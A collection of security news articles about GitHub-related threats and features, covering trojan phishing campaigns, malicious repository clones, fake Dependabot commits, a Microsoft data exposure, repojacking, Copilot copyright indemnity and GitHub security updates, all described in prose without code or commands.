Attaccanti distribuiscono trojan usando AWS e GitHub


I ricercatori di FortiGuard Labs hanno scoperto una campagna di phishing che porta gli utenti a scaricare un downloader Java malevolo per distribuire VCURMS e STRRAT, due trojan ad accesso remoto (RAT).

Il primo RAT è in grado di ottenere informazioni da diverse applicazioni, come Discord e Steam, e raccogliere cookie, dati per l’autocompletamento, la cronologia del browser e le password memorizzate nel browser. VCURMS è inoltre in grado di accedere alle informazioni di rete del dispositivo, a dati sull’hardware, alla lista di processi in esecuzione e può catturare screenshot. Il secondo trojan invece non solo permette a un attaccante di ottenere credenziali da browser e applicazioni, ma agisce anche come keylogger. 

trojan

Pixabay

Per ottenere accesso iniziale al dispositivo della vittima, gli attaccanti inviano una mail dove si richiede di verificare delle informazioni di pagamento, con allegato un file PDF. Il file è in realtà un eseguibile che, una volta aperto, scarica ed esegue un file JAR malevolo sul dispositivo della vittima.

Il file installa i due RAT e VCURMS si replica nella cartella Startup di Windows, così che venga sempre eseguiti durante lo startup del sistema. Il primo trojan è quello che si occupa della comunicazione con gli attaccanti: non appena la vittima è online, esso si connette al server C2 per ricevere istruzioni.

Stando all’analisi di FortiGuard Labs, gli attaccanti usano servizi come AWS e GitHub per distribuire i JAR e sfruttano protector commerciali per eludere i controlli di sicurezza.

Per proteggersi da questo tipo di attacchi è fondamentale controllare sempre la legittimità dei mittenti delle email e non scaricare allegati se non si è assolutamente certi della loro provenienza.

Condividi l’articolo



Articoli correlati

Altro in questa categoria


https://www.securityinfo.it/2024/03/14/attaccanti-distribuiscono-trojan-usando-aws-e-github/?utm_source=rss&utm_medium=rss&utm_campaign=attaccanti-distribuiscono-trojan-usando-aws-e-github




Su GitHub ci sono più di 100.000 repository malevoli


I ricercatori di Apiiro, fornitore di soluzioni unificate di sicurezza, hanno individuato l’espansione di una campagna di repository confusion che finora ha impattato migliaia di repo GitHub. La campagna, cominciata a metà dello scorso anno, ha avuto un picco negli ultimi mesi.

Negli attacchi di repository confusion gli attaccanti mirano a far scaricare alle vittime il proprio codice infetto invece di quello reale. Generalmente gli attaccanti clonano il repo target, lo infettano con payload di malware e lo caricano su GitHub con lo stesso nome. Per aumentare le possibilità di download, effettuano centinaia di fork e poi promuovono il repository sul web, usando forum e chat di sviluppatori.

Dopo che i developer hanno scaricato il repository, il payload nascosto installa il malware che raccoglie credenziali di login da diverse applicazioni, password e cookie del browser, oltre ad altri dati sensibili, e li invia al server C2 degli attaccanti.

Molti dei repository malevoli sono stati rimossi da GitHub per via delle centinaia di fork, ma molti altri sono riusciti a eludere i controlli della piattaforma.  I ricercatori spiegano che la campagna avviene su larga scala, quindi il numero di repository ancora online si aggira intorno alle centinaia di migliaia; considerando anche i repo rimossi, si parla di milioni di applicazioni malevole. Non solo: vista l’ampia portata degli attacchi, essi generano una sorta di rete di “ingegneria sociale di secondo ordine” nel momento in cui gli sviluppatori condividono i repo dannosi senza sapere che contengono malware.

GitHub repository

Pixabay

La tecnica di repository confusion su GitHub ha diversi vantaggi: in primis, la piattaforma ospita talmente tanti repo che, nonostante le istanze malevole siano molte, queste rappresentano comunque una porzione insignificante del totale ed è quindi difficile individuarle; inoltre, in questa campagna non vengono sfruttati i package manager, e ciò rende più complesso riconoscere i repo malevoli; infine, poiché i repository colpiti sono poco conosciuti e utilizzati solo da una nicchia di sviluppatori, è più semplice trarre in inganno gli utenti.

“GitHub è stata avvisata del problema e la maggior parte dei repository malevoli sono stati eliminati” scrivono i ricercatori, “ma la campagna continua e gli attacchi che tentano di iniettare codice malevolo nella supply chain stanno diventando sempre più diffusi“.

Oltre a chiedere agli sviluppatori di controllare attentamente i repository che stanno scaricando, Apiiro consiglia alle organizzazioni di implementare soluzioni per il monitoraggio del codice, sfruttando tecniche di analisi basate su IA per individuare porzioni di codice sospette.

Condividi l’articolo



Articoli correlati

Altro in questa categoria


https://www.securityinfo.it/2024/03/01/su-github-ci-sono-piu-di-100-000-repository-malevoli/?utm_source=rss&utm_medium=rss&utm_campaign=su-github-ci-sono-piu-di-100-000-repository-malevoli




Stolen GitHub Credentials Used to Push Fake Dependabot Commits

Threat actors have been observed pushing fake Dependabot contributions to hundreds of GitHub repositories in an effort to inject malicious code, application security firm Checkmarx reports.

Identified in July, the campaign relied on stolen GitHub personal access tokens to gain access to repositories and push code to steal sensitive information from projects and passwords from end users.

To evade detection, the attackers faked commit messages to make them appear as if generated by Dependabot, GitHub’s free automated dependency management tool that helps software developers identify and address vulnerabilities in their code.

Dependabot continuously scans a project’s dependencies and generates pull requests when identifying issues. The update requests, however, need user acknowledgement.

As part of the observed campaign, the attackers created a commit message “fix” that appeared to be contributed by the ‘dependabot[bot]’ user account, tricking developers into believing the commits came from GitHub’s tool.

Using this technique, the threat actors targeted hundreds of repositories, including private repositories, adding a new “hook.yml” file as a workflow file, to send GitHub secrets to an external server on every push event.

In addition to injecting this GitHub Action, the attackers modified all .js files within the targeted projects, by appending an obfuscated line of code at the end.

Advertisement. Scroll to continue reading.

The code would create a new script tag when executed in a browser, while also loading an additional script from a remote server, to intercept password-based forms and send user credentials to the attackers.

According to Checkmarx, the stolen GitHub personal access tokens used in this campaign were most likely exfiltrated from the victims’ systems after they downloaded a malicious package.

The security firm notes that the attacks were likely automated, and that it was difficult for the victims to identify the token compromise, as the token’s access log activity does not show in the account’s audit log.

“This whole situation teaches us to be careful about where we get our code, even from trusted places like GitHub. This is the first incident we witnessed a threat actor using fake git commits to disguise activity, knowing that many developers do not check the actual changes of Dependabot when they see it,” Checkmarx notes.

Related: GitHub Rotates Publicly Exposed RSA SSH Private Key

Related: Attackers Can Abuse GitHub Codespaces for Malware Delivery

Related: GitHub Announces New Security Improvements

https://www.securityweek.com/stolen-github-credentials-used-to-push-fake-dependabot-commits/




Microsoft AI Researchers Expose 38TB of Data, Including Keys, Passwords and Internal Messages

Researchers at Wiz have flagged another major security misstep at Microsoft that caused the exposure of 38 terabytes of private data during a routine open source AI training material update on GitHub.

The exposed data includes a disk backup of two employees’ workstations, corporate secrets, private keys, passwords, and over 30,000 internal Microsoft Teams messages, Wiz said in a note documenting the discovery.

Wiz, a cloud data security startup founded by ex-Microsoft software engineers, said the issue was discovered during routine internet scans for misconfigured storage containers. “We found a GitHub repository under the Microsoft organization named robust-models-transfer. The repository belongs to Microsoft’s AI research division, and its purpose is to provide open-source code and AI models for image recognition,” the company explained.

While sharing the files, Microsoft used an Azure feature called SAS tokens that allows data sharing from Azure Storage accounts. While the access level can be limited to specific files only; Wiz found that the link was configured to share the entire storage account — including another 38TB of private files. 

“This URL allowed access to more than just open-source models. It was configured to grant permissions on the entire storage account, exposing additional private data by mistake,” Wiz noted.

“Our scan shows that this account contained 38TB of additional data — including Microsoft employees’ personal computer backups. The backups contained sensitive personal data, including passwords to Microsoft services, secret keys, and over 30,000 internal Microsoft Teams messages from 359 Microsoft employees,” it added. 

In addition to what it describes as overly permissive access scope, Wiz found that the token was also misconfigured to allow “full control” permissions instead of read-only, giving attackers the power to delete and overwrite existing files.

Advertisement. Scroll to continue reading.

“An attacker could have injected malicious code into all the AI models in this storage account, and every user who trusts Microsoft’s GitHub repository would’ve been infected by it,” Wiz warned.

The repository’s primary function compounds the security concerns. Tasked with supplying AI training models, these blueprints come in a ‘ckpt‘ format, a creation of the widely-used TensorFlow and sculpted using Python’s pickle formatter. Wiz notes that the very format can be a gateway for arbitrary code execution.

“An attacker could have injected malicious code into all the AI models in this storage account, and every user who trusts Microsoft’s GitHub repository would’ve been infected by it,” the company added.

According to Wiz, Microsoft’s security response team invalidated the SAS token within two days of initial disclosure in June this year. The token was replaced on GitHub a month later.

Microsoft has published its own blog post to explain how the data leak occurred and how such incidents can be prevented.

“No customer data was exposed, and no other internal services were put at risk because of this issue. No customer action is required in response to this issue,” the tech giant noted.

*updated with link to Microsoft’s blog post

Related: Microsoft Puts ChatGPT to Work on Automating Security

Related: OpenAI Using Security to Sell ChatGPT Enterprise

Related: Wiz Says 62% of AWS Environments Exposed to Zenbleed

Related: Microsoft Hack Exposed More Than Exchange, Outlook Emails

https://www.securityweek.com/microsoft-ai-researchers-expose-38tb-of-data-including-keys-passwords-and-internal-messages/




Thousands of Code Packages Vulnerable to Repojacking Attacks

Despite GitHub’s efforts to prevent repository hijacking, cybersecurity researchers continue finding new attack methods, and thousands of code packages and millions of users could be at risk.

Repojacking is a repository hijacking method that involves renamed GitHub usernames. If a user renames their account, their old username can be registered by someone else, including malicious actors, and potentially abused for supply chain attacks.

Threat actors may be able to register an old username and create repositories that were previously associated with the old username, which could allow them to route traffic intended for the legitimate repository to their malicious repository. 

In order to prevent such attacks, GitHub has been implementing a retired namespace protection mechanism and it has been warning users about the potential risks associated with changing usernames. 

The namespace is the combination between the username and a specific repository name — for example, github.com/username/repo_name. If a user changes the username, the old username’s new owner cannot create a repository named ‘repo_name’ if the repository was previously cloned 100 times. This means that GitHub has retired the namespace. 

The problem is that researchers continue finding ways to bypass GitHub’s namespace retirement mechanism and conduct repojacking. 

The most recently disclosed attack method was discovered by researchers at cybersecurity firm Checkmarx in March and it was recently fixed by GitHub. 

This new method leveraged a race condition, with an API request being used to almost simultaneously create a new repository and change the account’s username. 

Advertisement. Scroll to continue reading.

If the attacker renames their account to the targeted username and later attempts to create a repository that would result in the creation of a retired namespace, their attempt would be blocked.

However — before GitHub rolled out a fix — if the account renaming and the repository creation were done at the same time, the attempt would be successful, enabling the attacker to obtain a namespace that would allow them to redirect traffic to their malicious repository. 

Checkmarx’s analysis showed that roughly 4,000 code packages in Go, PHP, Swift, as well as GitHub Actions were impacted, including hundreds of packages with more than 1,000 stars. 

“Poisoning a popular GitHub action could lead to major Supply Chain attacks with significant repercussions,” Checkmarx warned. 
The problem is that these packages will continue to be vulnerable to repojacking if a new bypass method is discovered in the future. 

“The discovery of this novel vulnerability in GitHub’s repository creation and username renaming operations underlines the persistent risks associated with the ‘Popular repository namespace retirement’ mechanism,” Checkmarx said in a blog post.

It added, “Many GitHub users, including users that control popular repositories and packages, choose to use the ‘User rename’ feature GitHub offers. For that reason, the attempt to bypass the ‘Popular repository namespace retirement’ remains an attractive attack point for supply chain attackers with the potential to cause substantial damages.”

The security firm has released an open source tool named ChainJacking that can be used to identify vulnerable packages. 

Related: Developers Warned of Malicious PyPI, NPM, Ruby Packages Targeting Macs

Related: ChatGPT Hallucinations Can Be Exploited to Distribute Malicious Code Packages

Related: Malicious NuGet Packages Used to Target .NET Developers

https://www.securityweek.com/thousands-of-code-packages-vulnerable-to-repojacking-attacks/




Microsoft offers legal protection for AI copyright infringement challenges

A man in an armor helmet sitting at a desk with a protective glowing field around him.

On Thursday, Microsoft announced that it will provide legal protection for customers who are sued for copyright infringement over content generated by the company’s AI systems. This new policy, called the Copilot Copyright Commitment, is an expansion of Microsoft’s existing intellectual property indemnification coverage, Reuters reports.

Microsoft’s announcement comes as generative AI tools like ChatGPT have raised concerns about reproducing copyrighted material without proper attribution. Microsoft has heavily invested in AI through products like GitHub Copilot and Bing Chat that can generate original code, text, and images on demand. Its AI models have gained these capabilities by scraping publicly available data off of the Internet without seeking express permission from copyright holders.

By offering legal protection, Microsoft aims to give customers confidence in deploying its AI systems without worrying about potential copyright issues. The policy covers damages and legal fees, providing customers with an added layer of protection as generative AI sees rapid adoption across the tech industry.

“As customers ask whether they can use Microsoft’s Copilot services and the output they generate without worrying about copyright claims, we are providing a straightforward answer: yes, you can, and if you are challenged on copyright grounds, we will assume responsibility for the potential legal risks involved,” writes Microsoft.

Under the new commitment, Microsoft will pay any legal damages for customers using Copilot, Bing Chat, and other AI services as long as they use built-in guardrails.

“Specifically, if a third party sues a commercial customer for copyright infringement for using Microsoft’s Copilots or the output they generate, we will defend the customer and pay the amount of any adverse judgments or settlements that result from the lawsuit, as long as the customer used the guardrails and content filters we have built into our products,” writes Microsoft.

With the rise of generative AI, the tech industry has been grappling with questions about properly crediting or licensing copyrighted source material used in training AI models. Legal experts say these thorny copyright issues will likely be decided through future legislation and court cases, some of which are already underway.

In fact, Microsoft has already attracted litigation over Copilot technology. Last November, the Joseph Saveri Law Firm filed a class-action lawsuit against Microsoft and OpenAI over GitHub Copilot’s alleged copyright violations that arose from scraping publicly available code repositories. Currently, the status of that lawsuit is unknown, and Ars Technica could not confirm if the case is still active using public records.

https://arstechnica.com/?p=1966332




GitHub Enterprise Server Gets New Security Capabilities

GitHub on Tuesday announced the general availability of Enterprise Server 3.10 with new security capabilities, including support for custom deployment rules.

With the new release, GitHub Projects is now generally available in Enterprise Server, providing administrators with increased visibility over issues and pull requests.

Now, teams using GitHub Actions can also create their own custom deployment protection rules, to ensure that only “the deployments that pass all quality, security, and manual approval requirements make it to production,” the code hosting platform explains.

The new release also provides administrators with additional control over the management and security of runners in GitHub Actions, allowing them to disable repository-level self-hosted runners across the entire organization and cross-user namespaces, to ensure that jobs are hosted on centrally managed machines only.

GitHub Enterprise Server 3.10 also makes it easier for developers to set up code scanning on their repositories, using the new default setup, without the need of YAML files. The new default setup also allows teams to enable code scanning across multiple repositories at once.

According to GitHub, the new release also makes it easier for security teams to track coverage and risks across all repositories, from the enterprise-level “code security” pages, through the Dependabot feature.

An ability to filter alerts on a repository by file path or language should make it easier to prioritize remediation efforts, while the newly added Swift support (which follows Kotlin support in the previous release) results in GitHub’s code scanning now covering iOS and Android development languages as well.

Advertisement. Scroll to continue reading.

GitHub also introduces fine-grained Personal Access Tokens in Enterprise Server, to minimize risks if one token is leaked (previously, PATs could be granted broad permissions across all repositories).

Developers can now select from a set of over 50 granular permissions, each with ‘no access’, ‘read’, or ‘read and write’ access options.

“Fine-grained PATs also have an expiration date, and they only have access to the repositories or organizations they are explicitly granted access to. This makes it easy for developers to follow a least privileged access model when using PATs,” GitHub explains.

The latest GitHub Enterprise Server release also brings refined branch protections (changes to how required protections are enforced, and on preventing last pushers from approving pull requests) and improved backup operations.

Related: GitHub Paid Out $1.5 Million in Bug Bounties in 2022

Related: GitHub Secret-Blocking Feature Now Generally Available

Related: GitHub Announces New Security Improvements

https://www.securityweek.com/github-enterprise-server-gets-new-security-capabilities/




The huge power and potential danger of AI-generated code

The huge power and potential danger of AI-generated code

In June 2021, GitHub announced Copilot, a kind of auto-complete for computer code powered by OpenAI’s text-generation technology. It provided an early glimpse of the impressive potential of generative artificial intelligence to automate valuable work. Two years on, Copilot is one of the most mature examples of how the technology can take on tasks that previously had to be done by hand.

This week GitHub released a report, based on data from almost a million programmers paying to use Copilot, that shows how transformational generative AI coding has become. On average, they accepted the AI assistant’s suggestions about 30 percent of the time, suggesting that the system is remarkably good at predicting useful code.

The striking chart above shows how users tend to accept more of Copilot’s suggestions as they spend more months using the tool. The report also concludes that AI-enhanced coders see their productivity increase over time, based on the fact that a previous Copilot study reported a link between the number of suggestions accepted and a programmer’s productivity. GitHub’s new report says that the greatest productivity gains were seen among less experienced developers.

On the face of it, that’s an impressive picture of a novel technology quickly proving its value. Any technology that enhances productivity and boosts the abilities of less skilled workers could be a boon for both individuals and the wider economy. GitHub goes on to offer some back-of-the-envelope speculation, estimating that AI coding could boost global GDP by $1.5 trillion by 2030.

But GitHub’s chart showing programmers bonding with Copilot reminded me of another study I heard about recently while chatting with Talia Ringer, a professor at the University of Illinois at Urbana-Champaign, about coders’ relationship with tools like Copilot.

Late last year, a team at Stanford University posted a research paper that looked at how using a code-generating AI assistant they built affects the quality of code that people produce. The researchers found that programmers getting AI suggestions tended to include more bugs in their final code—yet those with access to the tool tended to believe that their code was more secure. “There are probably both benefits and risks involved” with coding in tandem with AI, says Ringer. “More code isn’t better code.”

When you consider the nature of programming, that finding is hardly surprising. As Clive Thompson wrote in a 2022 WIRED feature, Copilot can seem miraculous, but its suggestions are based on patterns in other programmers’ work, which may be flawed. These guesses can create bugs that are devilishly difficult to spot, especially when you are bewitched by how good the tool often is.

We know from other areas of engineering that humans can be lulled into overreliance on automation. The US Federal Aviation Authority has repeatedly warned that some pilots are becoming so dependent on autopilot that their flying skills are atrophying. A similar phenomenon is familiar from self-driving cars, where extraordinary vigilance is required to guard against rare yet potentially deadly glitches.

This paradox may be central to the developing story of generative AI—and where it will take us. The technology already appears to be driving a downward spiral in the quality of web content, as reputable sites are flooded with AI-generated dross, spam websites proliferate, and chatbots try to artificially juice engagement.

None of this is to say that generative AI is a bust. There is a growing body of research that shows how generative AI tools can boost the performance and happiness of some workers, such as those who handle customer support calls. Some other studies have also found no increase in security bugs when developers use an AI assistant. And to its credit, GitHub is researching the question of how to safely code with AI assistance. In February, it announced a new Copilot feature that tries to catch vulnerabilities generated by the underlying model.

But the complex effects of code generation provide a cautionary tale for companies working to deploy generative algorithms for other use cases.

Regulators and lawmakers showing more concern about AI should also take note. With so much excitement about the technology’s potential—and wild speculation about how it could take over the world—subtler and yet more substantive evidence of how AI deployments are working out could be overlooked. Just about everything in our future will be underpinned by software—and if we’re not careful, it might also be riddled with AI-generated bugs.

This story originally appeared on wired.com.

https://arstechnica.com/?p=1951176




After 18 months, GitHub’s big code search overhaul is generally available

GitHub has announced the general availability of a ground-up rework of its code search that has been in development for years.

The changes include substantial new functionality that is significantly more aware of context. The company says its new code search is “about twice as fast” as the old code search and that it “understands code, putting the most relevant results first.”

That’s on top of redesigned search and code view interfaces. The new search interface offers suggestions and completions and categorizes and formats the results more intelligently.

Within the code view, you can easily see references in a side panel, more or less matching what you’d be able to do in Visual Studio when it comes to looking up and navigating to references. Substring queries, regular expressions, and symbol search are also supported.

GitHub published a guide to syntax, including but not limited to the usual stuff like leveraging boolean operations in queries or performing an exact search with quotation marks. There are also more specific features, like limiting your search to a specific repository, language, path, or organization.

This overhaul was first made available as a technology preview with a waitlist in December 2021. Those who opted in and were offered the new search spent a long time using it alongside the old code search as a separate tool.

If you want to go way deeper in understanding it, you can check out the GitHub engineering blog’s February 2023 post detailing exactly how it works, which technologies were used to build it, and so on.

The changes are meant to improve productivity for software developers—for example, the new search could be much more efficient for finding specific vulnerabilities in a large codebase.

As noted, the change has been in the works for a while, but GitHub is positioning it as part of a larger initiative to bring more intelligence to the platform. The other most notable bullet point in that initiative is the enrichening and expansion of the AI coding tool Copilot leveraging generative AI.

Listing image by GitHub

https://arstechnica.com/?p=1937544




GitHub Announces New Security Improvements

Microsoft-owned code hosting platform GitHub this week introduced NPM package provenance and deployment protection rules and announced the general availability of private vulnerability reporting.

Following a beta launch in November 2022, GitHub has now made private vulnerability reporting generally available, providing security researchers with a direct channel to report security defects they identify in public repositories.

To take advantage of the new capability, repository maintainers need to enable it in the ‘Security’ section of their repository’s ‘Settings’.

Once private vulnerability reporting has been enabled, security researchers can send bug reports to the maintainers, who can request for additional information and avoid being contacted publicly.

Now that the capability is generally available, maintainers can enable it at scale, for all repositories in their organization, they can select how to credit the reporters, and benefit from new integration and automation workflows, through a new repository security advisories API.

Starting this week, developers building NPM projects on GitHub Actions can publish package provenance, to provide users with information on source repositories and the build instructions used to publish it. GitHub will also collect this information.

Following an increase in software supply chain attacks where attackers compromise dependencies to inject malicious code into packages, the goal of NPM package provenance is to increase trust in the ecosystem, by providing visibility into how the code was translated into the published artifact.

“Our goal for the npm ecosystem is to bring the same level of transparency we have with the open source code itself to the process by which that code is built and published,” GitHub says.

To create a verifiable signature over the provenance statement, GitHub is requiring that packages are built using a trusted CI/CD platform. Furthermore, the provenance attestation is uploaded to Sigstore’s Rekor service, to offer visibility into tampering attempts.

“This provides visibility to the specific commit which triggered the build and the instructions which were used to publish the final artifact. With that information we increase the auditability of the build and make any attempt to tamper with the code much more visible,” the code hosting platform explains.

The third GitHub capability introduced this week is the public beta of deployment protection rules, which allows GitHub Enterprise Cloud (GHEC) users to employ the management mechanisms they need to ensure their applications are secure.

The rules bring additional controls to GitHub Actions CI/CD workflows, such as enforcing quality gates on deployments and allow GHEC users to create their own controls and even share them in the form of an application published to the GitHub marketplace.

A set of rules is already available to GHEC customers from several GitHub partners, including Datadog, Honeycomb, New Relic, NodeSource, Sentry, and ServiceNow.

Related: GitHub Secret Scanning Now Generally Available

Related: GitHub Introduces Automatic Vulnerability Scanning Feature

Related:GitHub Introduces Private Vulnerability Reporting for Public Repositories

https://www.securityweek.com/github-announces-new-security-improvements/